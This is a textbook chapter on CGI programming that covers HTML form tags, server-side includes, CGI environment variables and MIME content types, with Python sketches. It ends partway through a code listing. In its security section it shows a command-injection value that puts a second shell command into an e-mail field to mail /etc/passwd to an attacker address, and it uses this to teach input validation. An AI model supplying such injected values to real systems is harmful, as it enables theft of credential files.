UNIX Unleashed, Internet Edition

- 17 -

Programming Web Pages with CGI

by Robin Burk; David B. Horvath, CCP; and Matthew Curtin

So far in this section, we've seen how HTML can be used to specify the content and appearance of screen text and how MIME extends those capabilities to include other media such as graphics, audio, and video.

These elements on a Web page are static. That is, they are output to the user without soliciting or responding to user input (with the possible exception of hotlinks that allow the user to specify which media files to retrieve and when).

Web pages are not limited to static information displays, however. The Web, and indeed the entire Internet, is based on a client-server architecture. Interactions between client machines and Net servers provide much of the Web's flexibility and usefulness, contributing greatly to its rapid growth and the use of the Web for serious business purposes.

In this chapter, we'll look at the client side of one enabling, interactive technology: the Common Gateway Interface. In the following chapters, we'll look at CGI from the server side as well.

What Is the Common Gateway Interface?

The Common Gateway Interface (CGI) defines a platform-independent gateway from HTML scripts to other processes executing on the server. The most common use of CGI on Web pages is to pass data gathered on a screen form to a database application, and to populate a new client screen with appropriate information in response.

CGI mostly executes on the server. In the next few chapters of this section of UNIX Unleashed, we'll examine the details of CGI server-side implementation on UNIX using a variety of script and compiled languages.

However, an important part of this interactive process is the user interface for capturing user input and reporting information back to the user. It's this client side of CGI that we'll examine in this chapter.

What CGI Is Not

It's important to understand that CGI programs run on your server. Because of this, CGI is a great way to handle database queries, HTML form submissions, and that sort of thing. It's not a good way to do things like animation or a Web-based tic-tac-toe game, or to check that something submitted via a form is in the correct format. Things that make more sense to run on the client (for instance, in someone's browser) are better implemented with something like Java, JavaScript, or Safe-Tcl. (Checking for valid data formats in form submissions is a good example of something that makes sense to run on the client. Why burden your server with hits and processing time, only to tell the user that what he typed in is bogus? However, because client-side checks can be bypassed, the same checks also need to be done on the server. More on that later.)

SSI (Making dynamic pages without CGI)

SSI (Server-Side Includes) can also be used to generate dynamic pages. This works by having the server parse the HTML of the requested file, looking for certain commands embedded inside HTML comments and executing them. The server can even be configured to execute shell commands. Does this scare you? It should. The server reads the HTML and will execute the commands contained therein. If shell commands and CGI programs are allowed to be called, this is a very, very dangerous feature, especially if you allow users to publish their own pages (via the public_html directory in their home directories) and allow SSI in those directories.

Does this mean that SSI is always a Bad Thing and should always be avoided? No. I mention SSI in the context of CGI because it's a good idea to know what your options are and what makes sense in various situations, so you can use the right technology to get the end result that you want. SSI is appropriate for smaller-scale customizations of Web pages, such as page headers, page footers, and other things that can be accomplished without an SSI exec. CGI, on the other hand, is a means of building much more sophisticated Web-based applications and handling things like forms input. Generally speaking, if the focus of what you're writing is the HTML, with minor customizations to be done on the server, SSI is a good choice; but if the focus is the dynamic part of your content, perhaps including only small bits of preformatted HTML, CGI is the way to go. That said, it's also important to note that CGI is a standard interface, whereas SSI is an invention of the NCSA HTTPd developers, although it is now widely supported on other Web servers as well. SSI might present a compatibility problem for you in the future if you decide to move from one server to another.

More information is provided in the Server-Side Includes section later in this chapter.

Server APIs vs. CGI

Web server software such as Apache and Netscape's offerings lets you write code that effectively becomes part of the Web server itself. In some cases this can be useful (for example, when it would be beneficial to add some functionality to the core server). However, using a server's API limits your program's portability to one server, OS, and processor architecture. If what you want to do really belongs in the server's core functionality, and the API gives you the support you need, go for it. But for the vast majority of server-side processing, CGI is the way to go.

How CGI Works

The client-server interaction in CGI follows a series of standard steps:

1. The Web client (browser) connects to a Web server process by means of a URL.

2. The Web server delivers the HTML (and other files that make up the requested Web page) to the client. The connection is closed once the page contents have been delivered.

3. At the client, the HTML page prompts the user for some action or input. When the user responds (for example, by clicking a form's submit button), the client opens a new connection to the Web server.

4. Once the connection has been established, the client passes the user's input data to the Web server.

5. The Web server process passes this information, along with other process variables, to the CGI program named by a URL in the HTML (typically the form's ACTION attribute).

6. The CGI program performs some operation based on the input, generates a response to the client (typically in the form of an HTML document), and passes this to the Web server.

7. The Web server transmits the response to the client and (in most cases) closes the connection.

On the client side, processing occurs by means of HTML tags, which are interpreted the same way as other tags. On the server side, UNIX environmental variables, command-line arguments, and standard input and output files can be used to communicate between the Web server and the CGI program.
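To make steps 5 and 6 concrete, here is a minimal Python sketch of the server's half of the handoff: it sets a few CGI environment variables, feeds any POST data to the program's standard input, and collects whatever the program writes to standard output. The function name run_cgi and the inline echo program are hypothetical; a real Web server sets many more variables (see Table 17.1) and does not simply inherit its own environment.

```python
import os
import subprocess
import sys


def run_cgi(program, method="GET", query="", body=b""):
    """Run a CGI program roughly the way a Web server does (simplified sketch).

    Request data reaches the program through environment variables and
    standard input; the program's standard output becomes the response.
    """
    # Start from this process's environment for simplicity; a real server
    # passes a much smaller, controlled set of variables.
    env = dict(os.environ)
    env["GATEWAY_INTERFACE"] = "CGI/1.1"
    env["REQUEST_METHOD"] = method
    env["QUERY_STRING"] = query  # whatever followed the ? in the URL
    if body:
        env["CONTENT_LENGTH"] = str(len(body))
        env["CONTENT_TYPE"] = "application/x-www-form-urlencoded"
    # The request body goes to the program's STDIN; its STDOUT is captured.
    result = subprocess.run(program, input=body, env=env,
                            stdout=subprocess.PIPE, check=True)
    return result.stdout


if __name__ == "__main__":
    # A throwaway "CGI program" written inline: echo the method and POST data.
    echo = [sys.executable, "-c",
            "import os, sys; "
            "data = sys.stdin.read(int(os.environ['CONTENT_LENGTH'])); "
            "print('Content-type: text/plain'); print(); "
            "print(os.environ['REQUEST_METHOD'], data)"]
    print(run_cgi(echo, method="POST", body=b"userid=jdoe").decode())
```

Note that the CGI program never sees the network connection itself; everything it knows about the request arrives through the environment and STDIN.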

Basic Forms: Tags and Attributes

CGI forms are defined using HTML tags and elements that are dedicated to this purpose.

`FORM`

The FORM tag begins the definition of a form. Any number of forms may be defined on a given HTML page, but forms cannot be nested within one another. When designing Web pages that make use of forms, therefore, think about the logical flow of information and divide complex forms into successive, simpler ones if doing so would help the user keep track of the information and choices he must specify.

Any other legal HTML tags may be embedded within a form definition. Standard HTML is used, for instance, to label the input fields and the form itself.

Attributes:

ACTION--specifies the program on the Web server machine that will receive and process the form input.
METHOD--specifies how the form will send its information back to the server. The most common method is POST, which sends the input information in the body of the request, separately from the URL. The other method is GET (the default if METHOD is omitted), which appends the input information to the URL itself as a query string.

TIP: URL fields are limited in length. Except for very simple list selections or queries, use POST to return all forms input.

ENCTYPE--an optional attribute that tells the browser the MIME type into which to encode the information that will be sent to the server. The default type is application/x-www-form-urlencoded, which passes the input information as text to the Web server. The other option is multipart/form-data. This MIME type supports multiple formats within a single overall message; it is required, for instance, when the form includes a file field for uploading a file to the server (together with METHOD=POST).

Example:

<FORM ACTION="/cgi-bin/new-query"  METHOD=POST>
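To see what the default encoding looks like, Python's standard urllib.parse.urlencode produces essentially the same application/x-www-form-urlencoded string a browser builds from a form. The field names and values below are made up for illustration; the sketch also shows where that string travels under each METHOD.

```python
from urllib.parse import urlencode

# Hypothetical values a user might type into a form's fields.
fields = {"userid": "jdoe", "comments": "Ship it & bill me!"}

# application/x-www-form-urlencoded: name=value pairs joined by &,
# spaces become +, other special characters become %XX escapes.
encoded = urlencode(fields)

print("METHOD=GET  ->  /cgi-bin/new-query?" + encoded)  # data rides in the URL
print("METHOD=POST ->  request body: " + encoded)       # same string, sent separately
```

The encoded string is identical either way; only its location in the request differs, which is why GET data shows up in URLs and logs while POST data does not.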

`INPUT`

The INPUT tag is used to define various types of input fields within a form.

Attributes:

TYPE--specifies the kind of input field to be displayed. Legal types include text, password, checkbox, radio, file, submit, reset, and hidden.
TEXT fields accept keyboard characters and echo them back to the screen.
PASSWORD fields accept keyboard characters, but echo asterisks rather than the keyed text.
CHECKBOX fields are used in selection lists. Each checkbox is independent of others in the list; more than one can be selected at a time.
RADIO buttons are also used in selection lists; however, only one radio button in the list can be chosen. All the buttons in a list share a single NAME; that shared name is what groups them, so that choosing one deselects the others.
FILE fields accept the name of a local file to be uploaded to the server.
SUBMIT buttons allow the user to initiate sending the form information to the server.
RESET buttons allow the user to cancel form input and return all fields to their default values.
HIDDEN fields do not appear on the screen. They are used to pass persistent information from client to server and back to the client, because HTTP is otherwise a stateless protocol.
NAME--assigns a variable name to the information to be entered in this field.
SIZE--specifies the size of the input box to be displayed on the screen for a text or password field. Size does not constrain the length of the input for this field; if the user types more characters, the field will scroll to the left.
MAXLENGTH--specifies the maximum number of characters that may be entered in a text or password field.
VALUE--specifies the text to be associated with the field. This may be a default text value for a text field, the label displayed on a submit or reset button, or the value sent to the server when a checkbox or radio button is selected.
CHECKED--indicates that a checkbox or radio button is to be selected by default.

Listing 17.1 shows a typical sequence of field definitions and other HTML tags that might be used in a form.

Listing 17.1. Field definitions for a form.

<P>
Enter Userid:
<INPUT TYPE=text NAME="userid" VALUE="enter id here" SIZE=15 MAXLENGTH=15>
<P>
and Password:
<INPUT TYPE=password NAME="passwd" VALUE="(required)" SIZE=10 MAXLENGTH=10>
<P>
<INPUT TYPE=checkbox NAME="option1" >Choose option 1
<INPUT TYPE=checkbox NAME="option2" >   and option 2 if you like<BR>
<P>
<P>
Select one of the following:
<INPUT  TYPE=radio VALUE="a" NAME="choice" CHECKED > A
<INPUT  TYPE=radio VALUE="b" NAME="choice" > B
<INPUT  TYPE=radio VALUE="c" NAME="choice" > C<BR>
<P>
<INPUT TYPE=file NAME="send-file">
<INPUT TYPE=hidden NAME="user-state" VALUE="been here already">

These field definitions would result in the screen form shown in Figure 17.1.

Figure 17.1
Form fields as displayed by the browser.

Several aspects of this form are worth noting at this point. First, notice the use of standard HTML scripting to assign labels to the text and password fields and to display a header for the checkbox and radio button lists.

Second, notice that the browser (not the programmer) assigns the button label for file fields. This reminds us that HTML passes directives to the Web client (browser), but is not a text-formatting language. As with other tags, the screen results displayed by various browsers may differ when processing certain form-related tags.

And finally, note that the hidden field does not appear on the screen.
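On the server side, a CGI program might receive something like the string below from the fields in Listing 17.1. The values are invented, and the file field is left out because a real upload needs ENCTYPE="multipart/form-data". This Python sketch uses the standard urllib.parse.parse_qs to show two behaviors worth knowing: a checkbox with no VALUE attribute is sent as "on", and an unchecked checkbox is not sent at all. Note, too, that the password arrives as ordinary text unless the connection is encrypted.

```python
from urllib.parse import parse_qs

# What the browser might send for Listing 17.1 if the user checked only
# option 2 and chose B (values invented; the file field is left out).
body = ("userid=jdoe&passwd=secret&option2=on&choice=b"
        "&user-state=been+here+already")

form = parse_qs(body)  # maps each name to a list of values

option1 = "option1" in form              # unchecked boxes are not sent at all
option2 = form.get("option2") == ["on"]  # no VALUE attribute, so "on" is sent
choice = form.get("choice", ["a"])[0]    # radio group: at most one value
state = form["user-state"][0]            # the hidden field comes back too
print(option1, option2, choice, state)
```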

Advanced Forms

Although INPUT is the basic field definition tag, client-side CGI offers a number of other interactive capabilities for advanced forms processing.

`SELECT` and `OPTION`

The SELECT and OPTION tags provide a way to define a menu of options and capture the user's selection. Although you could hard-code this functionality using checkboxes and radio buttons, the SELECT list provides a more sophisticated menu effect and saves considerable screen space if the selection list is long.

As with the INPUT TYPE=file construct, different browsers may display a SELECT menu in somewhat different ways. All will, however, provide the user with a scrollable list of options from which to choose.

Unlike INPUT, the <SELECT> tag must be paired with a closing </SELECT> tag. In addition to the attributes associated with the SELECT tag itself, the selection list is defined as a series of <OPTION> tags between the <SELECT> and </SELECT> pair.

<SELECT> Attributes:

NAME--assigns a variable name to the information to be entered in this field.
SIZE--specifies the number of options that are visible at any one time. In many browsers, a value of 1 causes the list to be implemented as a pull-down menu and a greater value causes it to be implemented as a scroll window.
MULTIPLE--if present, indicates that the user may choose more than one selection.

<OPTION> Attributes:

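SELECTED--if present, indicates that the option is selected by default.
VALUE--specifies the value sent to the server when the option is chosen; if omitted, the option's text is sent.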

Listing 17.2 shows the definition of two SELECT lists.

Listing 17.2. Defining `SELECT` lists.

Please choose an option from the menu:
<SELECT NAME="pulldown" SIZE=1>
<OPTION>menu choice 1
<OPTION>menu choice 2
<OPTION>menu choice 3
</SELECT>
<P>
Please choose an option from the scrolling window:
<SELECT NAME="scrolling" SIZE=2>
<OPTION> window choice 1
<OPTION> window choice 2
<OPTION> window choice 3
</SELECT>
<P>

Figure 17.2 shows the resulting form display on the browser.

Figure 17.2
SELECT lists as pull-down menus and scrollable windows.
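When MULTIPLE is present, the browser sends a separate name=value pair for each selected option, all under the same NAME. The Python sketch below uses hypothetical data: it assumes the scrolling list from Listing 17.2 had the MULTIPLE attribute and that its options carried the made-up values w1, w2, and w3. It shows why a CGI program must be prepared for repeated names.

```python
from urllib.parse import parse_qs, parse_qsl

# Hypothetical submission: "menu choice 2" from the pull-down list, plus two
# entries from a MULTIPLE scrolling list whose options are assumed to have
# the values w1, w2, and w3.
body = "pulldown=menu+choice+2&scrolling=w1&scrolling=w3"

pairs = parse_qsl(body)  # keeps every pair, in order
form = parse_qs(body)    # groups repeated names into one list

naive = dict(pairs)      # a plain dict keeps only the last value per name
print(form["scrolling"], naive["scrolling"])
```

Collapsing the pairs into a simple name-to-value table, as the naive version does, silently loses all but the last selection.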

`TEXTAREA`

The TEXTAREA tag is used to create a multiple-line field for free-form text entry. Web page designers often add a textarea field to collect user comments, e-mail to the web author, or similar unstructured information.

As with SELECT, TEXTAREA requires a beginning and ending tag. Between these tags, and in addition to the attributes of the tag, the programmer can enter variable-length default text that will display when the textarea field is drawn on the screen. Unless the user deletes this text, it is submitted along with whatever he types.

Attributes:

NAME--assigns a variable name to the information to be entered in this field.
ROWS--specifies the number of rows to reserve on the screen. Actual input can exceed the visible textarea field.
COLS--specifies the width in characters of the textarea field on the screen.

Listing 17.3 defines a TEXTAREA field and Figure 17.3 shows the resulting form on the Netscape browser.

Listing 17.3. Defining a free-form `TEXTAREA`.

<P>
Please add any comments or special instructions below:
<P>
<TEXTAREA NAME="terms"  ROWS=6  COLS=50>
(comments)
</TEXTAREA>

Figure 17.3
Free-form TEXTAREA as displayed by the browser.

Server-Side Includes

HTML has no provision for defining and calling subroutines. However, a similar functionality can be added to your Web pages by means of a technique called server-side includes.

NOTE: Most popular Web server software supports server-side includes, but a few don't. Check your server documentation to verify if your own system has this capability.

This technique consists of asking the Web server to insert the contents of another file into the current HTML document before sending it to the client. This allows reuse of standard lists, forms, or other information across multiple pages without running the risk that updates to the information would occur on some pages but not on others.

Another use for server-side includes is to insert HTML generated dynamically (for example, by a CGI program) into the framework of an otherwise static page. This is a somewhat awkward way to embed dynamic HTML in your Web site, but it is occasionally useful.

The syntax for server-side includes is as follows:

<!--#include virtual="/yourfilestring/here" -->

While retrieving and transmitting the base HTML document, the server will encounter this line and insert the contents of the specified file into the document at that point.

This technique imposes an additional burden on the server system, which must parse each document for include directives. In most cases this has a negligible effect; however, on busy systems or in the case of very large include files, the extra processing can impact server performance.

It is customary (but not necessary) to name documents with server-side includes using the extension .shtml and to configure the Web server software such that all files with this extension are actively parsed by the server. In this case, files with the .html extension would be transmitted to the client without interpretation.
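The mechanism itself is simple text substitution. The following Python sketch mimics what a server does with an include directive in a parsed document; the function name expand_includes and the directory layout are hypothetical, and real servers such as NCSA HTTPd and Apache support many more directives, nested includes, and access controls.

```python
import os
import re
import tempfile

# Matches <!--#include virtual="..." -->, a small subset of real SSI syntax.
INCLUDE = re.compile(r'<!--#include\s+virtual="([^"]+)"\s*-->')


def expand_includes(html, docroot):
    """Replace each include directive with the contents of the named file.

    Sketch only: no nested includes, no caching, no other SSI commands.
    """
    root = os.path.realpath(docroot)

    def insert_file(match):
        # Map the URL-style path onto the document root and refuse to leave it.
        path = os.path.realpath(os.path.join(root, match.group(1).lstrip("/")))
        if not path.startswith(root + os.sep):
            return "<!-- include refused -->"
        with open(path, encoding="utf-8") as f:
            return f.read()

    return INCLUDE.sub(insert_file, html)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as docroot:
        with open(os.path.join(docroot, "footer.html"), "w", encoding="utf-8") as f:
            f.write("<hr>Last updated by the webmaster")
        page = '<p>Welcome!</p>\n<!--#include virtual="/footer.html" -->'
        print(expand_includes(page, docroot))
```

Every parsed page costs a scan like this one, which is the extra server burden described above.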

Design Considerations

Client-side CGI provides Web page developers with a rich set of form elements. As we'll see in subsequent chapters, server-side CGI provides an equally rich set of gateway and data manipulation capabilities.

Having good tools doesn't automatically guarantee that they will be used well, however. For your Web pages to be effective, you must pay attention to some design and coding considerations.

Fortunately, with most Web clients (browsers) you can view forms as you create them by loading the HTML file into the browser program. This will allow you to check out a page and experiment with design approaches without having a programmed server at hand.

Here are some guidelines and tips for creating attractive, easy-to-use Web pages that include forms:

Begin by laying out a logical view of the information flow on your site. What input and output objects should be close to one another? What information should be grouped on another form or another page?
Once you've identified a smooth information flow, choose a "look and feel" for your site. Will this be very business-like? Bright and flashy? Full of rich images that will take time to download?
The best way to choose an appropriate look and feel is to consider the needs and interests of your Web site's main audience. Is this a regular place for them to retrieve or input information? If so, make sure that the pages aren't cluttered and that they can complete the core input without having to tab through a lot of optional fields, which can go on a secondary form or page to be called up when necessary.
On the other hand, if your site must catch the attention of passers-by, choose design elements such as graphics that will get your message out as soon as the page begins loading.
Consistency is an important factor in screen and form design. Choose a few colors, fonts, and backgrounds. Place labels in the same relative place for all text fields, buttons, and checkboxes. Use HTML tags to align the labels and boxes so that the user's eye doesn't need to jump around on the screen in order to follow the information flow.
Make sure that the navigation path through the form parallels the appropriate information flow. In general, group fields in the order that the information naturally comes to mind; for instance, place name, address, and telephone together in one area of the form.
Save screen real estate, but not at the expense of readability. Size pull-down menus, selection boxes, and textareas so that they display some, but not necessarily all, of the options or input text.
Select input field types with an eye to ease of use. Where the user must choose from a long list of options, use pull-down menus. To allow him to select a variable number of options from a relatively short list, use checkboxes. Save radio buttons for toggling among a few options that seldom change from the default value.
Where appropriate, define default values so that your user can tab through the form quickly.
Be aware of the server side of things when you program client-side CGI. In particular, avoid using UNIX or CGI variable names for form fields. If your CGI program will access a formal database, avoid using database field names as well.

Using CGI

When you access a Web page (by specifying the URL or clicking on a link in another page), the server uses the provided path to retrieve the file and sends it to your browser. The same thing occurs when your browser requests an image, sound file, or other file. When the item desired is static or nearly so (like vacation photographs or the list of your top 10 favorite teachers), simple HTML files are an easy way to go.

But if the data is not static, someone must constantly maintain and update the HTML. If the data changes frequently (like the weather or the stock market), this becomes difficult: with the time involved to research the data by hand and update the HTML, the page is already out of date by the time it is available. In addition, we all have better things to do than being report formatters.

Instead of loading a static HTML file, a CGI script can be executed. The script does whatever research is necessary (database lookups, calculations, and so on) and then writes out HTML code to dynamically create the page. Instead of the data being hours or even weeks out of date through the manual process, it can be as current as processing and Internet time lags allow (seconds).

HTML is interpreted by a browser and could be thought of as executing on the client machine. Other tools, such as Java and JavaScript, also execute on the client machine. CGI is different: it executes on the server (the machine you may have to take care of). You should be able to control the code that executes on the server, because you wrote it or can control what code other people may run there.

How To Execute CGI

When you are coding your HTML, you can reference a CGI script just like a Web page or other resource (image, sound, and so on). The server determines that the resource is a program to execute rather than a file to send. Some servers require that these programs, whatever their names, be placed in a special directory (often called cgi-bin) so that they can be identified easily.

The URL used to execute a CGI script when the user clicks on a link might look like the following:

<a href="http://www.company.domain/cgi-bin/environ?query=1"> xxx </a>

The URL used to automatically execute a CGI script when the page is loaded (to update and display a counter in the form of a gif image) might look like the following:

<img src="http://www.name.com/cgi-bin/nph-count.gif?width=9&link=xxx">

Security Issues

You must code your scripts carefully to prevent input data from being executed. You must verify the size, form, and validity of input data. If you expect an e-mail address as input (and use it to send mail to that address), you must make sure that it is just an e-mail address. If the user types in her proper e-mail address, everything works fine. But if she decides to be difficult and enter her e-mail address as

myname@myaddress.com ; mail cracker@hiding.out < /etc/passwd

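and your script passes that string to a shell command line (to run mail, for instance), the shell treats the semicolon as a command separator, and your password file is sent to cracker@hiding.out.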
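A Python sketch of the two defenses that apply here: accept only input that matches a strict pattern (a whitelist), and never hand user data to a shell. The regular expression is a deliberately conservative assumption, not a complete definition of legal addresses, and send_confirmation assumes a UNIX mail command that accepts -s for the subject.

```python
import re
import subprocess

# A deliberately strict whitelist: it must start with a letter or digit
# (so it can't be mistaken for a command option), contain one @, and use
# only letters, digits, and . _ + - otherwise. Some unusual but legal
# addresses are rejected; for a sketch that is an acceptable trade-off.
EMAIL = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def is_safe_email(address):
    return EMAIL.fullmatch(address) is not None


def send_confirmation(address, message):
    """Mail a message, assuming a UNIX mail command that accepts -s."""
    if not is_safe_email(address):
        raise ValueError("rejected e-mail address")
    # Pass the arguments as a list so no shell is involved: characters such
    # as ; < | are never interpreted as shell syntax.
    subprocess.run(["mail", "-s", "Thank you", address],
                   input=message.encode(), check=True)
```

Either defense alone helps; together, a malformed address is rejected before it is used, and even a pattern mistake would not give the user a shell.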

Many security problems arise because the system was designed and implemented by people who didn't understand the environment where the application would be deployed.

Here are some tips that will be useful in developing good CGI programs.

Don't assume that no one sitting somewhere on the Internet between a remote client and the server where your CGI application is running will be able to see the traffic between the two. If you have data that is at all sensitive, use SSL or SHTTP to encrypt that channel.
Don't use an HTTP GET when you should use a POST. As a general rule, anytime you want to send data back up to the server, it should be done with a POST, unless you're passing up a small amount of data that has absolutely no security or privacy implications associated with it. For example, if you've got a CGI program that will give a city street map based on coordinates passed up to the server, that's fine to put in a GET so you can process the query string. However, if you're passing up someone's credit card number, or any other private, personal data (even a name or phone number!), do so with a POST.
Since using GET and query strings makes the parameters part of the URL, the data sent up from the client will appear in server and proxy logs (and in the browser's history), and it is more easily obtained than POST data.
Do write your programs to be as paranoid as possible, especially if they're going to be accessible from the Internet. The Internet is becoming an increasingly bad neighborhood, and people will try to exploit your programs to do naughty things. Simply assuming that you can't be a target is stupid.
Don't create programs that are completely useless to people not running the most recent beta of a browser that's implemented tons of proprietary features. While a given browser might be used enough that you can address most of your audience, keep in mind that there are people out there whose browsers won't display frames, whose vision is so impaired that they have to use text-only browsers, and some behind firewalls that filter out JavaScript.
The Internet was built to connect people together and to let everyone exchange ideas. Don't build proprietary systems that go contrary to the whole spirit of the Internet and prevent people from using the resource. There isn't anything wrong, per se, with building CGI applications (or static HTML pages!) that take advantage of certain browser types, use features like frames, and have highly graphical user interfaces, but if you do this, make sure that you build your applications in such a way that those without those features can use them. For example, put something more than "go get a browser that can support frames" in the part of the page that displays on non-frames browsers, provide a text-only version of the page, or use ALT attributes on your <IMG> tags so the page can still be navigated without images.

Following these simple guidelines will prevent you from needlessly limiting your audience, hindering your program's usefulness, and compromising the privacy of people using it.

Data Available to the Shell Script

There are a number of environmental variables and other data sources available to a CGI script, whether it is a shell script or is written in any other language. The variables and values vary with the Web server and the Web browser being used on the client side.

Table 17.1 shows the common environmental variables available to CGI scripts. These are in addition to the normal variables that may be available from the shell itself.

Table 17.1. Environmental variables.

Variable             Description
AUTH_TYPE            User authentication type (if used)
CONTENT_LENGTH       Size of attached data in bytes
CONTENT_TYPE         Content type of attached data (used with PUT and POST)
GATEWAY_INTERFACE    CGI specification version supported by the server
HTTP_ACCEPT          MIME types the client browser will accept, comma-delimited: type/subtype, type2/subtype
HTTP_CONNECTION      Connection type ("Keep-Alive", for example)
HTTP_HOST            DNS name of the server; may be an alias
HTTP_REFERER         URL of the page containing the link to this CGI script
HTTP_USER_AGENT      Software name/version of the client browser
PATH_INFO            Extra path information following the script name in the URL
PATH_TRANSLATED      PATH_INFO translated from a logical (URL) path into a physical file system path
QUERY_STRING         Arguments placed after the ? in the URL
REMOTE_ADDR          IP address of the remote host
REMOTE_HOST          Name of the remote host (via DNS), or IP address if DNS name not available
REMOTE_IDENT         User id (if IDENT, RFC 931, is supported)
REMOTE_USER          Authenticated user id (if used/supported)
REQUEST_METHOD       Request method (GET, POST, and so on)
SCRIPT_NAME          Logical path and name of the script
SERVER_NAME          Server name (DNS alias, actual name, or IP address)
SERVER_PORT          Port used to answer the request
SERVER_PROTOCOL      Name/version of the protocol used
SERVER_SOFTWARE      Name/version of the Web server software
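A common first CGI program simply reports these variables back to the browser, which is a quick way to learn what your particular server provides. The Python sketch below is one such report; the function name environment_report is hypothetical, and it escapes every value because several of them come straight from the client.

```python
import html
import os

# The variables from Table 17.1, in the same order.
CGI_VARS = [
    "AUTH_TYPE", "CONTENT_LENGTH", "CONTENT_TYPE", "GATEWAY_INTERFACE",
    "HTTP_ACCEPT", "HTTP_CONNECTION", "HTTP_HOST", "HTTP_REFERER",
    "HTTP_USER_AGENT", "PATH_INFO", "PATH_TRANSLATED", "QUERY_STRING",
    "REMOTE_ADDR", "REMOTE_HOST", "REMOTE_IDENT", "REMOTE_USER",
    "REQUEST_METHOD", "SCRIPT_NAME", "SERVER_NAME", "SERVER_PORT",
    "SERVER_PROTOCOL", "SERVER_SOFTWARE",
]


def environment_report(environ):
    """Build a complete CGI response listing the Table 17.1 variables."""
    lines = ["Content-type: text/html", "",
             "<html><head><title>CGI environment</title></head><body><pre>"]
    for name in CGI_VARS:
        value = environ.get(name, "(not set)")
        # Escape every value: several (QUERY_STRING, HTTP_REFERER,
        # HTTP_USER_AGENT) come straight from the client.
        lines.append(f"{name} = {html.escape(value)}")
    lines.append("</pre></body></html>")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(environment_report(os.environ), end="")
```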

In addition to the query string that is attached to the URL after the ? (returned through the environment variable QUERY_STRING), data sent with a POST request is available through STDIN (standard input). The data will be in the form described by CONTENT_TYPE and will be CONTENT_LENGTH bytes long.

There is no guarantee that the server will signal end-of-file after the input, so read exactly CONTENT_LENGTH bytes and then decode the data as necessary. Data submitted from a form is typically of CONTENT_TYPE application/x-www-form-urlencoded: name=value pairs separated by &, with spaces converted to + and other special characters converted to their hexadecimal equivalents (an & inside a value, for example, becomes %26).
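A Python sketch of that input-handling logic: for POST, check the content type, check the size, and read exactly CONTENT_LENGTH bytes; for GET, use QUERY_STRING. The function name read_form and the 100,000-byte limit are assumptions for illustration. The reader is passed in as a function so the logic can be tried without a real server.

```python
import os
import sys
from urllib.parse import parse_qs

MAX_LENGTH = 100_000  # arbitrary limit for this sketch; refuse larger bodies


def read_form(environ, read):
    """Return submitted fields as {name: [values]} for a GET or POST request.

    `read` is a function that reads a given number of bytes from standard
    input, normally sys.stdin.buffer.read.
    """
    if environ.get("REQUEST_METHOD", "GET").upper() == "POST":
        ctype = environ.get("CONTENT_TYPE", "")
        if not ctype.startswith("application/x-www-form-urlencoded"):
            raise ValueError("unsupported CONTENT_TYPE: " + ctype)
        length = int(environ.get("CONTENT_LENGTH") or 0)
        if length < 0 or length > MAX_LENGTH:
            raise ValueError("bad CONTENT_LENGTH")
        # Read exactly CONTENT_LENGTH bytes instead of waiting for end-of-file.
        raw = read(length).decode("ascii", errors="replace")
    else:
        raw = environ.get("QUERY_STRING", "")
    # parse_qs turns + into spaces and decodes %XX escapes (as UTF-8).
    return parse_qs(raw)


if __name__ == "__main__":
    form = read_form(os.environ, sys.stdin.buffer.read)
    print("Content-type: text/plain\n")
    print(form)
```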

Output from CGI scripts is written to STDOUT (standard output). It must begin with an HTTP header that tells the browser what kind of data it is getting, followed by a blank line. Anything after that is interpreted by the browser as that type of data. If the browser is told that it is getting HTML, it will interpret it as HTML; if it is told that a GIF file is coming from the server, it will attempt to interpret what follows as a GIF image.

Output Types

At the beginning of every CGI script, you need to tell the client browser what it is you are sending. This is done through the first two lines:

Content-type: text/html
(blank line)

The first line is the type of data, the second line is always blank. The server will add in additional information as needed.

The most common type is text/html, which is used, as the name implies, to denote that the output contains HTML code in a text format (no binary data). These are referred to as MIME (Multipurpose Internet Mail Extensions) types (MIME is explained in Chapter 16 of Volume 2) and are used to specify the type of data and the encoding method used to transmit that data.

Table 17.2 shows the common content types. The Web browser might not be able to handle a specific type directly. In that case, it will use what are known as "helpers" or "helper applications," which are external programs that are able to handle the content.

Table 17.2. Common content types.

Content Type                          Description
application/fractals                  Fractal
application/mac-binhex40              Macintosh archive (BinHex)
application/octet-stream              Binary data (for example, executables)
application/postscript                PostScript file
application/rtf                       Rich Text Format
application/x-compress                Compressed file
application/x-csh                     C shell script
application/x-gzip                    Gzip-compressed file
application/x-latex                   LaTeX file
application/x-sh                      Bourne shell script
application/x-stuffit                 Macintosh archive (StuffIt)
application/x-tar                     UNIX tape archive format
application/x-troff-man               Troff/manual
application/x-unknown-content-type    Unknown
application/x-www-form-urlencoded     Encoded data from HTML form
application/x-zip-compressed          Zip-compressed file
audio/basic                           Sound file
audio/x-aiff                          AIFF sound file
audio/x-wav                           Windows WAV sound
image/gif                             CompuServe image format (GIF)
image/jpeg                            Image format (JPEG)
image/tiff                            Image format (TIFF)
image/x-cmu-raster                    Image format (CMU raster)
image/x-portable-anymap               Image format (PNM)
image/x-portable-bitmap               Image format (PBM)
image/x-portable-graymap              Image format (PGM)
image/x-portable-pixmap               Image format (PPM)
image/x-rgb                           Image format (RGB)
image/x-xbitmap                       Image format (X bitmap)
image/x-xpixmap                       Image format (X pixmap)
text/html                             Hypertext Markup Language
text/plain                            Plain text
text/richtext                         Rich text
video/mpeg                            MPEG video
video/quicktime                       QuickTime video
video/x-msvideo                       Windows AVI video
video/x-sgi-movie                     SGI movie format

CONTENT_TYPE tells your script what it received from the browser; HTTP_ACCEPT tells it what the browser can display.
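As an illustration of using HTTP_ACCEPT, a script that can produce either HTML or plain text might pick whichever the browser says it accepts. This Python sketch is a simplified form of content negotiation under a stated assumption: it ignores the q-value preferences some browsers attach (such as ;q=0.5), and the function name choose_type is hypothetical.

```python
def choose_type(http_accept, offered=("text/html", "text/plain")):
    """Pick the first type in `offered` that the browser's HTTP_ACCEPT allows.

    Simplification: q-values (preferences such as ;q=0.5) are ignored.
    """
    accepted = set()
    for item in http_accept.split(","):
        media = item.split(";")[0].strip().lower()  # drop any parameters
        if media:
            accepted.add(media)
    for ctype in offered:
        major = ctype.split("/")[0]
        if {ctype, major + "/*", "*/*"} & accepted:
            return ctype
    return offered[-1]  # nothing matched: fall back to the last choice


# Usage inside a CGI script:
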